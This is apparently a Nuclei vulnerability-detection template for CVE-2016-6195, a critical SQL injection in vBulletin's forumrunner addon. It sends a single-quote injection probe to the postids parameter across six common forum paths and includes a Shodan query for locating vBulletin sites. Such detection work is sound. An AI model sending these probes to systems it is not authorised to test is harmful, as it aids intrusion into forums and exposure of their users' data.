id: CVE-2016-6195

info:
  name: vBulletin <= 4.2.3 - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
  remediation: |
    Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.
  reference:
    - https://www.cvedetails.com/cve/CVE-2016-6195/
    - https://www.exploit-db.com/exploits/38489
    - https://enumerated.wordpress.com/2016/07/11/1/
    - http://www.vbulletin.org/forum/showthread.php?t=322848
    - https://github.com/drewlong/vbully
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-6195
    cwe-id: CWE-89
    epss-score: 0.00284
    epss-percentile: 0.65202
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 6
    vendor: vbulletin
    product: vbulletin
    shodan-query: title:"Powered By vBulletin"
  tags: cve,cve2016,vbulletin,sqli,forum,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "type=dberror"

      - type: status
        status:
          - 200
          - 503
        condition: or
# digest: 4a0a004730450220148de5e061a5fe3c6251106bab498d7528013e666aa29dec23d9e56137ecc6e3022100bff36120bf8be39928532a80d88f9b499c3209b24b6514ec62efea47503690e7:922c64590222798bb761d5b6d8e72950